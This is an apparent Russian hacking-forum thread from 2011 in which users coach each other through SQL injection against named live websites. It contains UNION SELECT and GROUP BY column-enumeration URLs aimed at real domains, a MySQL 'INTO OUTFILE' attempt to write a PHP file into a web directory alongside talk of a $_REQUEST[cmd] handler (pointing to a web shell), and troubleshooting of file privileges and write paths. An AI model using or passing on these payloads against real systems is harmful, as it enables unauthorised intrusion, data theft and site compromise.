31.10.2011, 22:33
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
В админке есть SQL-менеджер, папка есть, файл прив тоже.
|
|
|
31.10.2011, 22:39
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Может в том, что пыху не понятно, что такое cmd?
$_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.
from mysql.user - нужно убрать вообще
|
|
|
|
31.10.2011, 22:43
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Код:
Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1
Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
|
|
|
|
31.10.2011, 23:43
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1
как такое крутить?
|
|
|
|
31.10.2011, 23:54
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от vaddd
http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1
как такое крутить?
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20+
вот так вот и надо...как обычную
|
|
|
|
01.11.2011, 00:14
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от Gorev
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20+
вот так вот и надо...как обычную
ясно...
смутило это:
Сообщение от None
http://www.pmrs.ps/last/etemplate.php?id=249%20order%20by%20100500
|
|
|
|
01.11.2011, 00:35
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от Melfis
Может в том, что пыху не понятно, что такое cmd?
$_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.
Глупости, отработает и так
Сообщение от Melfis
from mysql.user - нужно убрать вообще
Не всегда, только если mysql не старый.
wkar у тебя файл не создаётся, варианта три:
1 Нет прав на запись
2 Нет прав на операции с файлами (файлприва тоесть)
3 Путь не верный
--------
upd
Этого не заметил
Сообщение от wkar
Код:
Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1
Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
А откуда лимит-то? Менеджер добавляет наверное? Так срежь его )
|
|
|
|
01.11.2011, 00:55
|
|
Познающий
Регистрация: 23.08.2010
Сообщений: 45
С нами:
8273846
Репутация:
0
|
|
Разьясните пожалуста что здесь не так?
Код:
-ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
все ок 92
далее ставлю
-ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+
ответ
The used SELECT statements have a different number of columns
и ошибка... union+select получается не работает? |
|
|
|
01.11.2011, 08:16
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от namez2
Разьясните пожалуста что здесь не так?
Код:
-ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
все ок 92
далее ставлю
-ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+
ответ
The used SELECT statements have a different number of columns
и ошибка... union+select получается не работает? ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается?
если сам сайт, то пропробуй +GROUP+BY+95+--+
там полей может быть больше 92
|
|
|
|
01.11.2011, 11:53
|
|
Познающий
Регистрация: 23.08.2010
Сообщений: 45
С нами:
8273846
Репутация:
0
|
|
Сообщение от stepashka_
ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается?
если сам сайт, то пропробуй +GROUP+BY+95+--+
там полей может быть больше 92
полей получается 92. (сайт виден)
вот запрос на 93 выдает (Unknown column '93' in 'group statement')
вот пример
Код:
http://www.mesta-vstrech.ru/mesto.php?id=1+GROUP+BY+93+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
